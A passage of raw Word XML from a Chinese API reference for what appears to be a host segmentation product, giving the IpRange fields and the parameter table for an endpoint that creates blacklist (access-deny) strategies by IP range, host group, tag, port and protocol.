          <w:p w14:paraId="30BDD628" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签颜色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FDB510A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0C23C2D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BC0DDB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2105F98A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D42F0FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7713D2E5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52F5D305" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BAD53C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03733DBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4380A9EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E8EA296" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>endIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51003706" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="104BB58D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A03E2C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="创建黑名单策略"/>
      <w:bookmarkEnd w:id="227"/>
      <w:r>
        <w:t>创建黑名单策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421FEBE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA996D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/black-strategy/create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0CB076"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563"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5E921D2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7DA9075" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E4C06D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40B71354" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A6D4F90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D537012" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26764DB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="238F734B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5146BE9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220B79FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CDAC545" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74FF2CDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C6921AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="683DF2BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B963778" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BED7EB6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCEB744" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28598552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D5C578F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A97C857" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51FA9399" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0122BC13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C95E1F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D0AC25C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70CF0B8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E473AF1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14FD2A61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F4F7DE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="379D6593" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4E98C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7ADB67A0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DAD220A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25FFC874" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B9D67E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54667D22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1004BFD7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E236301" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E99FD32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34934D38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12061FF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F8EEBF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="214059AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CBCE8A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="363678AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C08A85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FACCBAE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78FECF19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="625BDBA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79069352" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C4EA216" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E25524F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630EBA0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4704C836" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D8195A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F5655C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38E305F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D3A88B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AF5C279" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71327E09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="391A16A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39EB85A2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7868A8A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="621AD2ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A1ABA38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E66D44E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AE3D555" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B7274C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F63FAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F5735D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5057945F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="570FAF98" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="217BE909" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A7B8DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="226BD1C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5B6A74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="155AFC58" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD030B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40E89AF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="368CE292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55DCDEC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56F2B69B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E8F681A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>displaySrcIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9986C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22D3AE19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
